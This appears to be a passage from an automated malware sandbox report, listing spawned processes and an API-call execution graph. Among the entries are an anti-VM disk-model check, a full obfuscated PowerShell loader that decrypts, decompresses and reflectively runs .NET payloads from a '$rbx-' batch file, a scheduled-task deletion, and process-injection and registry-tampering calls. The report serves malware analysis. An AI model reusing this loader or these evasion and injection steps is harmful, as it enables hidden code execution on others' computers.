                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:03:17:14
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\dwm.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"dwm.exe"
                                                                    Imagebase:0x7ff79d4a0000
                                                                    File size:94'720 bytes
                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:16
                                                                    Start time:03:17:14
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:wmic diskdrive get Model
                                                                    Imagebase:0x7ff68d690000
                                                                    File size:576'000 bytes
                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:03:17:14
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\findstr.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
                                                                    Imagebase:0x7ff698e50000
                                                                    File size:36'352 bytes
                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:03:17:18
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:20
                                                                    Start time:03:17:18
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:21
                                                                    Start time:03:17:19
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:22
                                                                    Start time:03:17:19
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:23
                                                                    Start time:03:17:20
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:24
                                                                    Start time:03:17:20
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:25
                                                                    Start time:03:17:21
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:26
                                                                    Start time:03:17:22
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:27
                                                                    Start time:03:17:22
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
                                                                    Imagebase:0x7ff792220000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:03:17:22
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell.exe -WindowStyle Hidden
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:29
                                                                    Start time:03:17:24
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:30
                                                                    Start time:03:17:24
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:31
                                                                    Start time:03:17:24
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:32
                                                                    Start time:03:17:25
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:33
                                                                    Start time:03:17:25
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:34
                                                                    Start time:03:17:26
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:35
                                                                    Start time:03:17:26
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:36
                                                                    Start time:03:17:26
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:37
                                                                    Start time:03:17:27
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:38
                                                                    Start time:03:17:28
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:39
                                                                    Start time:03:17:28
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:40
                                                                    Start time:03:17:28
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:41
                                                                    Start time:03:17:29
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:42
                                                                    Start time:03:17:29
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\dllhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
                                                                    Imagebase:0x7ff669820000
                                                                    File size:21'312 bytes
                                                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:43
                                                                    Start time:03:17:30
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:44
                                                                    Start time:03:17:30
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
                                                                    Imagebase:0x7ff7b3100000
                                                                    File size:235'008 bytes
                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:45
                                                                    Start time:03:17:30
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:46
                                                                    Start time:03:17:31
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:47
                                                                    Start time:03:17:31
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:48
                                                                    Start time:03:17:31
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\spoolsv.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\spoolsv.exe
                                                                    Imagebase:0x7ff7f6100000
                                                                    File size:842'752 bytes
                                                                    MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:49
                                                                    Start time:03:17:32
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:50
                                                                    Start time:03:17:33
                                                                    Start date:09/12/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                    Imagebase:0x7ff7e52b0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:46.8%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:72.9%
                                                                      Total number of Nodes:251
                                                                      Total number of Limit Nodes:30
                                                                      execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 568 140001cc8 CloseHandle 564->568 569 140001a29 564->569 566 1400019b3 CloseHandle 565->566 567 140001983 PathFindFileNameW lstrlenW 565->567 566->564 571 1400019c1 566->571 567->566 570 1400019a0 StrCpyW 567->570 568->557 569->568 572 140001a33 OpenProcessToken 569->572 570->566 571->564 574 1400019e0 StrCmpIW 571->574 572->568 573 140001a51 GetTokenInformation 572->573 575 140001af4 573->575 576 140001a79 GetLastError 573->576 574->568 574->571 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->568 583 140001b0f 578->583 580 140001ae2 579->580 581 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->568 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->568 586->568 587 140001bf8 VirtualAllocEx 586->587 587->568 588 140001c27 WriteProcessMemory 587->588 588->568 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->568 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->568 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 140003112 632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 681->680 682 140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 